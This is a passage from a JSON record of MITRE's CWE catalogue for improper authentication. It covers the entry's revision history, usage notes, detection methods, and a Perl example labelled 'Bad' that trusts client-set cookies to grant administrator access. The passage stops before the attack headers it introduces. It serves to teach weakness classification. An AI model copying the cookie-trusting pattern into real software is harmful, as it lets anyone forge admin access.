},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Name",
"ModificationDate": "2009-01-12",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Related_Attack_Patterns",
"ModificationDate": "2009-05-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-07-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Observed_Examples",
"ModificationDate": "2009-10-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, References",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings",
"ModificationDate": "2010-02-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2011-03-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2013-07-17",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-02-18",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-06-23",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2015-12-07",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2017-01-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns, Relationships",
"ModificationDate": "2017-05-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Related_Attack_Patterns, Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-09-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Demonstrative_Examples",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples, Relationships",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References, Relationships",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes, Observed_Examples, Taxonomy_Mappings",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Diagram",
"ModificationDate": "2024-07-16",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-07-16",
"ModificationVersion": "4.15",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2024-11-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-11-19",
"ModificationVersion": "4.16",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Provided diagram to improve CWE usability",
"ContributionDate": "2024-02-29",
"ContributionName": "Abhi Balakrishnan",
"ContributionOrganization": null,
"ContributionReleaseDate": "2024-07-16",
"ContributionType": "Content",
"ContributionVersion": "4.15",
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Authentication Issues",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2009-01-12",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insufficient Authentication",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Discouraged
|
This CWE entry might be misused when lower-level CWE entries are likely to be applicable. It is a level-1 Class (i.e., a child of a Pillar).
|
Consider children or descendants, beginning with CWE-1390: Weak Authentication or CWE-306: Missing Authentication for Critical Function.
|
[
"Frequent Misuse"
] |
[
{
"Comment": "Weak Authentication",
"CweID": "1390"
},
{
"Comment": "Missing Authentication for Critical Function",
"CweID": "306"
}
] |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "\n\nAutomated static analysis is useful for detecting certain types of authentication. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authentication libraries.\n\n\nGenerally, automated static analysis tools have difficulty detecting custom authentication schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an established identity; an automated technique that detects the absence of authentication may report false positives.\n",
"DetectionMethodID": "DM-6",
"Effectiveness": "Limited",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "\n\nThis weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.\n\n\nManual static analysis is useful for evaluating the correctness of custom authentication mechanisms.\n",
"DetectionMethodID": "DM-7",
"Effectiveness": "High",
"EffectivenessNotes": "These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.",
"Method": "Manual Static Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tBinary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Binary or Bytecode"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tWeb Application Scanner\n\t\tWeb Services Scanner\n\t\tDatabase Scanners",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Automated Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tFuzz Tester\n\t\tFramework-based Fuzzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tManual Source Code Review (not inspections)",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Manual Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tSource code Weakness Analyzer\n\t\tContext-configured Source Code Weakness Analyzer",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis - Source Code"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tCost effective for partial coverage:\n```\n\n\t\tConfiguration Checker",
"DetectionMethodID": null,
"Effectiveness": "SOAR Partial",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
},
{
"Description": "\n\nAccording to SOAR, the following detection techniques may be useful:\n\n```\n\t\tHighly cost effective:\n```\n\n\t\tInspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)\n\t\tFormal Methods / Correct-By-Construction",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following code intends to ensure that the user is already logged in. If not, the code performs authentication with the user-provided username and password. If successful, it sets the loggedin and user cookies to \"remember\" that the user has already logged in. Finally, the code performs administrator tasks if the logged-in user has the \"Administrator\" username, as recorded in the user cookie.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tmy $q = new CGI;\n\tif ($q->cookie('loggedin') ne \"true\") {\n\t\t\tif (! AuthenticateUser($q->param('username'), $q->param('password'))) {\n\t\t\t\tExitError(\"Error: you need to log in first\");\n\t\t\t}\n\t\t\telse {\n\t\t\t\t\t# Set loggedin and user cookies.\n\t\t\t\t\t$q->cookie(\n\t\t\t\t\t\t-name => 'loggedin',\n\t\t\t\t\t\t-value => 'true'\n\t\t\t\t\t\t);\n\t\t\t\t\t$q->cookie(\n\t\t\t\t\t\t-name => 'user',\n\t\t\t\t\t\t-value => $q->param('username')\n\t\t\t\t\t\t);\n\t\t\t}\n\t}\n\tif ($q->cookie('user') eq \"Administrator\") {\n\t\tDoAdministratorTasks();\n\t}\n```",
"IntroText": null,
"Language": "Perl",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Unfortunately, this code can be bypassed. The attacker can set the cookies independently so that the code does not check the username and password. The attacker could do this with an HTTP request containing headers such as:",
"ExampleCode": null,
